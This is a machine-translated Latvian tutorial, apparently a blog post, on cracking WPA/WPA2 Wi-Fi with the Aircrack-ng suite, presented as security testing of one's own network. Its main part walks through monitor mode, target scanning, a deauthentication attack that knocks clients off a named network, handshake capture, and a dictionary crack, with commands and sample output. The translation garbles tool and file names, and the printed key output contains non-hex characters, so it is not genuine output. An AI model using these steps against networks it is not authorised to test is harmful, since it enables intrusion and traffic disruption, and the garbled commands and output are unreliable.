lidmašīna

Kā lietot Aircrack-ng

Kā lietot Aircrack-ng
Lielāko daļu laika cilvēki nekad nedomā par tīklu, ar kuru viņi ir savienoti. Viņi nekad nedomā, cik drošs ir šis tīkls, un cik daudz viņi katru dienu riskē ar saviem konfidenciālajiem datiem. Varat veikt ievainojamības pārbaudes savos wifi tīklos, izmantojot ļoti spēcīgu rīku, ko sauc Aircrack-ng un Wireshark. Wireshark tiek izmantots tīkla aktivitātes uzraudzībai. Aircrack-ng ir vairāk kā agresīvs rīks, kas ļauj uzlauzt un piešķirt piekļuvi bezvadu savienojumiem. Domāšana par iebrucēju vienmēr ir bijis drošākais veids, kā pasargāt sevi no uzlaušanas. Jūs varētu saprast precīzas darbības, kuras iebrucējs veiks, lai iegūtu piekļuvi jūsu sistēmai, uzzinot par lidmašīnām. Pēc tam jūs varat veikt atbilstības pārbaudes savā sistēmā, lai pārliecinātos, ka tā nav nedroša.

Aircrack-ng ir pilns programmatūras komplekts, kas paredzēts WiFi tīkla drošības pārbaudei. Tas nav tikai viens rīks, bet rīku kolekcija, no kuriem katram ir noteikts mērķis. Var strādāt ar dažādām wifi drošības jomām, piemēram, piekļuves punkta uzraudzību, testēšanu, uzbrukumu tīklam, wifi tīkla uzlaušanu un tā pārbaudi. Aircrack galvenais mērķis ir pārtvert paketes un atšifrēt jauktuves, lai izjauktu paroles. Tas atbalsta gandrīz visas jaunās bezvadu saskarnes. Aircrack-ng ir uzlabota novecojušo rīku komplekta Aircrack versija, ng attiecas uz Jauna paaudze. Daži no lieliskajiem rīkiem, kas darbojas kopā, veicot lielāku uzdevumu.

Airmon-ng:

Airmon-ng ir iekļauts aircrack-ng komplektā, kas tīkla interfeisa karti ievieto monitora režīmā. Tīkla kartes parasti pieņem tikai tām paredzētas paketes, kā noteikts NIC MAC adresē, bet ar airmon-ng tiks pieņemtas arī visas bezvadu paketes neatkarīgi no tā, vai tās ir tām mērķētas vai nē. Jums vajadzētu būt iespējai noķert šīs paketes, nesaistot un neautentificējot ar piekļuves punktu. To izmanto, lai pārbaudītu piekļuves punkta statusu, tīkla interfeisu ievietojot monitora režīmā. Pirmkārt, jākonfigurē bezvadu kartes, lai ieslēgtu monitora režīmu, pēc tam jānogalina visi fona procesi, ja domājat, ka kāds process tam traucē. Pēc procesu pārtraukšanas bezvadu saskarnē var iespējot monitora režīmu, izpildot zemāk esošo komandu:

[aizsargāts ar e-pastu]: ~ $ sudo airmon-ng start wlan0 #

Monitora režīmu var arī atspējot, apturot airmon-ng jebkurā laikā, izmantojot zemāk esošo komandu:

[aizsargāts pa e-pastu]: ~ $ sudo airmon-ng stop wlan0 #

Airodump-ng:

Airodump-ng tiek izmantots, lai uzskaitītu visus tīklus, kas mūs ieskauj, un lai skatītu vērtīgu informāciju par tiem. Airodump-ng pamata funkcionalitāte ir paku šņaukšana, tāpēc tā būtībā ir ieprogrammēta, lai satvertu visas apkārt esošās paketes, vienlaikus ievietojot monitora režīmā. Mēs palaidīsim to pret visiem savienojumiem ap mums un apkoposim datus, piemēram, ar tīklu pieslēgto klientu skaitu, viņu atbilstošās mac adreses, šifrēšanas stilu un kanālu nosaukumus, un pēc tam sāksim mērķēt uz mūsu mērķa tīklu.

Ierakstot komandu airodump-ng un kā parametru piešķirot tīkla saskarnes nosaukumu, mēs varam aktivizēt šo rīku. Tajā būs uzskaitīti visi piekļuves punkti, izmantoto datu pakešu daudzums, šifrēšanas un autentifikācijas metodes, kā arī tīkla nosaukums (ESSID). No uzlaušanas viedokļa vissvarīgākie lauki ir mac adreses.

[aizsargāts pa e-pastu]: ~ $ sudo airodump-ng wlx0mon

Aircrack-ng:

Aircrack tiek izmantots paroļu uzlaušanai. Pēc visu pakešu uztveršanas, izmantojot airodump, mēs varam salauzt atslēgu ar aircrack. Tas sašķeļ šos taustiņus, izmantojot divas metodes PTW un FMS. PTW pieeja tiek veikta divos posmos. Sākumā tiek izmantotas tikai ARP paketes, un tikai pēc tam, ja atslēga pēc meklēšanas nav uzlauzta, tā izmanto visas pārējās tvertnes. PTW pieejas pluss ir tas, ka plaisāšanai netiek izmantotas visas paketes. Otrajā pieejā, t.i.e., FMS, atslēgas uzlaušanai mēs izmantojam gan statistikas modeļus, gan brutāla spēka algos. Var izmantot arī vārdnīcas metodi.

Gaisa spēle:

Airplay-ng ievieš paketes bezvadu tīklā, lai izveidotu vai paātrinātu trafiku. Paketes no diviem dažādiem avotiem var uztvert ar aireplay-ng. Pirmais ir tiešais tīkls, bet otrais - jau esošā pcap faila paketes. Airplay-ng ir noderīgs atautentizācijas uzbrukuma laikā, kura mērķis ir bezvadu piekļuves punkts un lietotājs. Turklāt jūs varat veikt dažus uzbrukumus, piemēram, kafijas latte uzbrukumu, izmantojot airplay-ng - rīku, kas ļauj iegūt atslēgu no klienta sistēmas.  To var sasniegt, noķerot ARP paketi un pēc tam ar to manipulējot un nosūtot atpakaļ sistēmā. Pēc tam klients izveidos paketi, kuru var notvert lidmašīna, un aircrack plaisā atslēgu no šīs modificētās paketes. Dažas citas airplay-ng uzbrukuma iespējas ietver karbonādi, fragmentu atkārtoto atskaņošanu utt.

Airbase-ng:

Airbase-ng tiek izmantots, lai pārveidotu iebrucēja datoru par apdraudētu savienojuma punktu, ar kuru citiem izveidot saiti. Izmantojot Airbase-ng, jūs varat apgalvot, ka esat likumīgs piekļuves punkts, un veikt tiešos uzbrukumus datoriem, kas pievienoti jūsu tīklam. Šāda veida uzbrukumus sauc par ļaunajiem dvīņu uzbrukumiem. Pamata lietotājiem nav iespējams atšķirt likumīgu piekļuves punktu un viltotu piekļuves punktu. Tātad ļaunā dvīņu draudi ir vieni no draudīgākajiem bezvadu draudiem, ar kuriem mēs šodien sastopamies.

Airolib-ng:

Airolib paātrina uzlaušanas procesu, saglabājot un pārvaldot paroļu sarakstus un piekļuves punktu. Šīs programmas izmantotā datu bāzes pārvaldības sistēma ir SQLite3, kas lielākoties ir pieejama visās platformās. Paroles uzlaušana ietver pāra galvenās atslēgas aprēķinu, caur kuru tiek iegūta privātā pārejošā atslēga (PTK). Izmantojot PTK, jūs varat noteikt ietvara ziņojuma identifikācijas kodu (MIC) konkrētai paketei un teorētiski atrast, ka MIC ir līdzīgs paketei, tādēļ, ja PTK bija taisnība, arī PMK bija taisnība.

Lai skatītu datu bāzē saglabātos paroļu sarakstus un piekļuves tīklus, ierakstiet šādu komandu:

[aizsargāts pa e-pastu]: ~ $ sudo airolib-ng testdatabase -stats

Šeit testdatabase ir db, kuram vēlaties piekļūt vai izveidot, un -stats ir darbība, kuru vēlaties tajā veikt. Datu bāzes laukos varat veikt vairākas darbības, piemēram, piešķirot maksimālu prioritāti kādam SSID vai tamlīdzīgam. Lai izmantotu airolib-ng ar aircrack-ng, ievadiet šādu komandu:

[aizsargāts ar e-pastu]: ~ $ sudo aircrack-ng -r testdatabase wpa2.eapols.vāciņš

Šeit mēs izmantojam jau aprēķinātos PMK, kas saglabāti testa datu bāze paroles uzlaušanas procesa paātrināšanai.

WPA / WPA2 uzlaušana, izmantojot Aircrack-ng:

Apskatīsim nelielu piemēru tam, ko aircrack-ng var darīt, izmantojot dažus tā lieliskos rīkus.  Mēs salauzīsim WPA / WPA2 tīkla iepriekš koplietoto atslēgu, izmantojot vārdnīcas metodi.

Pirmais, kas mums jādara, ir uzskaitīt tīkla saskarnes, kas atbalsta monitora režīmu. To var izdarīt, izmantojot šādu komandu:

[e-pasts aizsargāts]: ~ $ sudo airmon-ng
PHY interfeisa draivera mikroshēmojums
Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Mēs varam redzēt saskarni; tagad mums ir jāievieto atrastais tīkla interfeiss (wlx0) monitora režīmā, izmantojot šādu komandu:

[aizsargāts ar e-pastu]: ~ $ sudo airmon-ng start wlx0

Tas ir iespējojis monitora režīmu sauktajā saskarnē wlx0mon.

Tagad mums jāsāk klausīties blakus esošo maršrutētāju raidījumus, izmantojot mūsu tīkla saskarni, kuru esam iestatījuši monitora režīmā.

[aizsargāts ar e-pastu]: ~ $ sudo airodump-ng wlx0mon
CH 5] [Pagājis: 30 s] [2020-12-02 00:17
 
BSSID PWR bākas #Data, # / s CH MB ENC CIPHER AUTH ESSID
 
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54e WPA2 CCMP PSK CrackIt
C4: E9: 84: 76: 10: BE -63 77 0 0 6 54e. WPA2 CCMP PSK HAckme
C8: 3A: 35: A0: 4E: 01-63 84 0 0 8 54e WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54e WPA2 CCMP PSK TP-Link_3802
 
BSSID STATION PWR Rate Lost Frames Probe
 
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1e- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -39 0e- 1 1002 13 

Mūsu mērķa tīkls ir Kraklis šajā gadījumā, kas pašlaik darbojas 1. kanālā.

Šeit, lai uzlauztu mērķa tīkla paroli, mums jāaptver četrvirzienu rokasspiediens, kas notiek, kad ierīce mēģina izveidot savienojumu ar tīklu. Mēs to varam notvert, izmantojot šādu komandu:

[aizsargāts pa e-pastu]: ~ $ sudo airodump-ng -c 1 --bssid E4: 6F: 13: 04: CE: 31 -w / home wlx0

-c         : Kanāls

-bssid: Mērķa tīkla Bssid

-w        : Direktorija nosaukums, kurā tiks ievietots pcap fails

Tagad mums jāgaida ierīces savienojums ar tīklu, taču ir labāks veids, kā uzņemt rokasspiedienu. Mēs varam noņemt ierīču AP atiestatīšanu, izmantojot deautentizācijas uzbrukumu, izmantojot šādu komandu:

[aizsargāts pa e-pastu]: ~ $ sudo aireplay-ng -0 -a E4: 6F: 13: 04: CE: 31

a: Mērķa tīkla Bssid

-0: Deauthentication uzbrukums

Mēs esam atvienojuši visas ierīces, un tagad mums jāgaida, kamēr ierīce izveidos savienojumu ar tīklu.

CH 1] [Pagājis: 30 s] [2020-12-02 00:02] [WPA rokasspiediens: E4: 6F: 13: 04: CE: 31
 
BSSID PWR RXQ bākas # dati, # / s CH MB ENC CIPHER AUTH E
 
E4: 6F: 13: 04: CE: 31 -47 1 228 807 36 1 54e WPA2 CCMP PSK P
 
BSSID STATION PWR Rate Lost Frames Probe
 
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7E: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0e- 1e 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7E -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0e- 6e 263 708 CrackIt
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ED: E3 -35 0e- 0e 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1            

Mēs saņēmām trāpījumu, un, aplūkojot augšējo labo stūri tieši blakus laikam, varam redzēt, ka ir notverts rokasspiediens. Tagad meklējiet norādīto mapi ( /mājas mūsu gadījumā) par “.pcap”Fails.

Lai uzlauztu WPA atslēgu, mēs varam izmantot šādu komandu:

[aizsargāts ar e-pastu]: ~ $ sudo aircrack-ng -a2 -w rockyou.txt -b E4: 6F: 13: 04: CE: 31 rokasspiediens.vāciņš
b: mērķa tīkla Bssid
-a2: WPA2 režīms
Rokijs.txt: Izmantotais vārdnīcas fails
Rokasspiediens.vāciņš: fails, kurā ir notverts rokasspiediens
Aircrack-ng 1.2. beta3
[00:01:49] Pārbaudītas 10566 atslēgas (1017.96 k / s)
GALVENĀ ATRASTĀ! [ tu mani pieķēri ]
Galvenā atslēga: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0C 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Pārejoša atslēga: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Mūsu mērķa tīkla atslēga ir veiksmīgi uzlauzta.

Secinājums:

Bezvadu tīkli ir visur, un tos izmanto katrs uzņēmums, sākot no darbiniekiem, kuri lieto viedtālruņus, līdz rūpnieciskām vadības ierīcēm. Saskaņā ar pētījumu datiem 2021. gadā gandrīz vairāk nekā 50 procenti no interneta trafika būs vairāk nekā WiFi.  Bezvadu tīkliem ir daudz priekšrocību, komunikācija ārpus durvīm, ātra piekļuve internetam vietās, kur gandrīz nav iespējams ievietot vadus, var paplašināt tīklu, neuzstādot kabeļus nevienam citam lietotājam, un jūs viegli varat savienot savas mobilās ierīces ar mājas birojiem, kamēr jūs neesat tur nav.

Neskatoties uz šīm priekšrocībām, ir liela jautājuma zīme par jūsu privātumu un drošību. Tā kā šie tīkli; maršrutētāju pārraides diapazonā ir atvērti ikvienam, viņiem var viegli uzbrukt, un jūsu dati var tikt viegli apdraudēti. Piemēram, ja jums ir izveidots savienojums ar kādu publisku wifi, ikviens, kas ir savienots ar šo tīklu, var viegli pārbaudīt jūsu tīkla trafiku, izmantojot kādu izlūkošanas informāciju un pieejamo lielisko rīku palīdzību, un pat to izmest.

Kā lejupielādēt un atskaņot Sid Meier Civilization VI operētājsistēmā Linux
Ievads spēlē Civilization 6 ir mūsdienīga klasiskā koncepcija, kas ieviesta Age of Empires spēļu sērijā. Ideja bija diezgan vienkārša; jūs sāktu pašā ...
Kā instalēt un spēlēt Doom uz Linux
Ievads liktenī Doom sērija radās 90. gados pēc sākotnējā Doom izlaišanas. Tas bija tūlītējs hīts, un kopš tā laika spēļu sērija ir saņēmusi daudzas ba...
Vulkan Linux lietotājiem
Ar katru jauno grafisko karšu paaudzi mēs redzam, kā spēļu izstrādātāji pārspēj grafiskās uzticamības robežas un tuvojas fotoreālismam. Neskatoties uz...